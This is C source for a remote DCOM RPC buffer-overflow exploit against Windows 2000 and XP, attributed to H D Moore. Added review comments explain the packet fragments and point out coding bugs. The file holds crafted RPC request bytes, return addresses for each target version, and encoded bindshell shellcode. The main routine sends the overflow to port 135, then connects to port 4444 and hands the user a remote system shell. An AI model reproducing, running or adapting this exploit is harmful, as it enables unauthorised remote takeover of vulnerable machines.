
  1. /*
  2.   DCOM RPC Overflow Discovered by LSD
  3.    -> http://www.lsd-pl.net/files/get?WINDOWS/win32_dcom
  4.    
  5.   Based on FlashSky/Benjurry's Code
  6.    -> http://www.xfocus.org/documents/200307/2.html
  7.    
  8.   Written by H D Moore <hdm [at] metasploit.com>
  9.    -> http://www.metasploit.com/
  10.    
  11.   - Usage: ./dcom <Target ID> <Target IP>
  12.   - Targets:
  13.   -          0    Windows 2000 SP0 (english)
  14.   -          1    Windows 2000 SP1 (english)
  15.   -          2    Windows 2000 SP2 (english)
  16.   -          3    Windows 2000 SP3 (english)
  17.   -          4    Windows 2000 SP4 (english)
  18.   -          5    Windows XP SP0 (english)
  19.   -          6    Windows XP SP1 (english)
  20.  
  21. */
  22.  
  23. #include <stdio.h>
  24. #include <stdlib.h>
  25. #include <error.h>
  26. #include <sys/types.h>
  27. #include <sys/socket.h>
  28. #include <netinet/in.h>
  29. #include <arpa/inet.h>
  30. #include <unistd.h>
  31. #include <netdb.h>
  32. #include <fcntl.h>
  33. #include <unistd.h>
  34.  
/* Packet sent first by main() on the port-135 connection (named as the RPC
 * bind request). main() reads one reply into buf1 after sending it and
 * ignores the reply's contents. Never modified at runtime. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  41.  
/* First fragment of the second packet. main() copies it to the start of buf2
 * and then adds (sizeof(sc) - 0xc) to the 32-bit values at offsets 8, 0x10,
 * 0x80, 0x84, 0xb4, 0xb8, 0xd0 and 0x18c of that copy (length fields, by the
 * look of it). This array itself is not modified. */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  98.  
/* Second fragment (16 bytes). Unlike the other arrays this one is patched IN
 * PLACE by main(), which adds sizeof(sc)/2 to the values at offsets 0 and 8
 * through an `unsigned long *` cast. That cast assumes a 4-byte unsigned long
 * and aliases the byte array through an integer pointer (strict-aliasing UB). */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  102.  
/* Third fragment, appended to buf2 right after sc: a 2-bytes-per-character
 * string reading "\C$\123456" followed by fifteen '1's and ".doc", with a
 * two-byte terminator. Not modified at runtime. */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  109.  
  110.  
  111.  
/* Display name for each Target ID (argv[1]); entry i pairs with offsets[i].
 * The trailing NULL only terminates the usage listing in main() -- it is not
 * used to bound the index. Initialising `unsigned char *` from string literals
 * (type `char *`) draws a pointer-sign warning; `const char *` would be the
 * matching type, since the literals must never be written. */
unsigned char *targets [] =
        {
            "Windows 2000 SP0 (english)",
            "Windows 2000 SP1 (english)",
            "Windows 2000 SP2 (english)",
            "Windows 2000 SP3 (english)",
            "Windows 2000 SP4 (english)",
            "Windows XP SP0 (english)",
            "Windows XP SP1 (english)",
             NULL
        };
  123.         
/* Return address per Target ID, parallel to targets[] (7 entries, no
 * sentinel). main() indexes it with the unchecked atoi() of argv[1], so an
 * out-of-range or negative ID reads past the end of this array. */
unsigned long offsets [] =
        {
            0x77e81674,
            0x77e829ec,
            0x77e824b5,
            0x77e8367a,
            0x77f92a9b,
            0x77e9afe3,
            0x77e626ba,
        };
  134.  
/* Payload inserted between request2 and request3. main() overwrites the four
 * bytes at offset 36 -- the "\xff\xff\xff\xff" placeholder that follows the
 * 36 bytes of filler below -- with offsets[target_id], so this array is
 * modified in place. sizeof(sc) (which includes the literal's terminating
 * NUL) also drives the length fixups applied to request2 and buf2. */
unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address (offset 36, patched by main) */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
  188.  
  189.    
  190.  
/* Final fragment, appended to buf2 after request3. Not modified at runtime. */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  197.  
  198.  
  199. /* ripped from TESO code */
/* Relay bytes between stdin/stdout and `sock` until one side closes.
 * Never returns: every exit path calls exit(EXIT_FAILURE), so the caller's
 * return value is unreachable.
 *
 * NOTE(review): rfds is declared but never cleared with FD_ZERO, so select()
 * is passed an indeterminate fd_set (UB; works by accident if the stack
 * happens to be zero). The select() return value and both write() results
 * are also unchecked, so short writes silently drop data. */
void shell (int sock)
{
        int     l;            /* byte count from the last read() */
        char    buf[512];     /* relay buffer, reused in both directions */
        fd_set  rfds;         /* never cleared -- see note above */


        while (1) {
                FD_SET (0, &rfds);
                FD_SET (sock, &rfds);

                select (sock + 1, &rfds, NULL, NULL, NULL);
                if (FD_ISSET (0, &rfds)) {
                        /* local stdin -> socket; EOF or error on stdin ends the session */
                        l = read (0, buf, sizeof (buf));
                        if (l <= 0) {
                                printf("\n - Connection closed by local user\n");
                                exit (EXIT_FAILURE);
                        }
                        write (sock, buf, l);
                }

                if (FD_ISSET (sock, &rfds)) {
                        /* socket -> local stdout; 0 means the peer closed, <0 is a read error */
                        l = read (sock, buf, sizeof (buf));
                        if (l == 0) {
                                printf ("\n - Connection closed by remote host.\n");
                                exit (EXIT_FAILURE);
                        } else if (l < 0) {
                                printf ("\n - Read failure\n");
                                exit (EXIT_FAILURE);
                        }
                        write (1, buf, l);
                }
        }
}
  234.  
  235.  
/* Entry point. argv[1] is the Target ID (index into targets[]/offsets[]),
 * argv[2] the target IP in dotted-quad form.
 *
 * Flow: assemble buf2 = request1 | request2 | sc | request3 | request4 and
 * adjust several 32-bit length fields by sizeof(sc); connect to port 135,
 * send bindstr, read (and discard) one reply, send buf2; close; wait one
 * second; connect to port 4444 and hand the socket to shell(), which never
 * returns.
 *
 * Return value: every failure path returns 0, so the process exit status does
 * not distinguish success from a socket/connect/send error; only the usage
 * path exits non-zero.
 *
 * NOTE(review): memcpy() is used but <string.h> is not among the includes,
 * so the call relies on an implicit declaration (an error in C99 and later). */
int main(int argc, char **argv)
{

    int sock;
    int len,len1;                  /* len: recv() count (the initial store is dead); len1: bytes assembled in buf2 */
    unsigned int target_id;        /* from atoi(argv[1]); unsigned, so a negative argument wraps to a huge index */
    unsigned long ret;             /* offsets[target_id], copied into sc+36 */
    struct sockaddr_in target_ip;
    unsigned short port = 135;
    unsigned char buf1[0x1000];    /* receive buffer for the reply to bindstr; contents are ignored */
    unsigned char buf2[0x1000];    /* outgoing second packet, assembled from the request* arrays and sc */

    printf("---------------------------------------------------------\n");
    printf("- Remote DCOM RPC Buffer Overflow Exploit\n");
    printf("- Original code by FlashSky and Benjurry\n");
    printf("- Rewritten by HDM <hdm [at] metasploit.com>\n");


    if(argc<3)
    {
        printf("- Usage: %s <Target ID> <Target IP>\n", argv[0]);
        printf("- Targets:\n");
        /* targets[] is NULL-terminated; `len` is just a loop index here */
        for (len=0; targets[len] != NULL; len++)
        {
            printf("-          %d\t%s\n", len, targets[len]);
        }
        printf("\n");
        exit(1);
    }

    /* yeah, get over it :) */
    /* NOTE(review): no validation of argv[1] -- atoi() returns 0 for
     * non-numeric input and the index is never compared against the 7
     * entries in offsets[], so an out-of-range ID reads past the array. */
    target_id = atoi(argv[1]);
    ret = offsets[target_id];

    /* NOTE(review): %x expects unsigned int but ret is unsigned long;
     * the conversion is mismatched wherever the two types differ in size. */
    printf("- Using return address of 0x%.8x\n", ret);

    /* Patch the 4-byte placeholder at sc+36 with the chosen address.
     * Copies the first 4 bytes of ret's object representation, i.e. the low
     * 32 bits on a little-endian host. */
    memcpy(sc+36, (unsigned char *) &ret, 4);

    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);   /* return value not checked for INADDR_NONE */
    target_ip.sin_port = htons(port);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        perror("- Connect");
        return(0);
    }

    len=sizeof(sc);                       /* dead store: len is overwritten by recv() below before any use */
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    /* Adjust two 32-bit fields of the GLOBAL request2 in place (not the copy).
     * Both accesses alias the byte array through `unsigned long *`, which is
     * strict-aliasing UB and assumes a 4-byte unsigned long. */
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

    /* Append the remaining fragments; len1 tracks the running length.
     * The combined size is well under the 0x1000-byte buf2, but nothing
     * checks that, so any growth of the arrays would need a bound here. */
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    /* Adjust 32-bit fields inside the request1 portion of buf2 by the payload
     * size (sizeof(sc) - 0xc). Same aliasing / long-width caveat as above. */
    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;


    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;

    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            perror("- Send");
            return(0);
    }
    /* Reply to bindstr: read up to 1000 bytes and ignore both the count and
     * the contents (a -1 error or a 0-byte close is not detected). */
    len=recv(sock, buf1, 1000, 0);

    if (send(sock,buf2,len1,0)== -1)
    {
            perror("- Send");
            return(0);
    }
    close(sock);
    sleep(1);   /* fixed one-second wait before the second connection */

    /* Second connection, same host, port 4444 (see the comment in sc[]). */
    target_ip.sin_family = AF_INET;
    target_ip.sin_addr.s_addr = inet_addr(argv[2]);
    target_ip.sin_port = htons(4444);

    if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
    {
        perror("- Socket");
        return(0);
    }

    if(connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)) != 0)
    {
        printf("- Exploit appeared to have failed.\n");
        return(0);
    }

    printf("- Dropping to System Shell...\n\n");

    shell(sock);   /* does not return; exits via exit(EXIT_FAILURE) */

    return(0);
}
  354.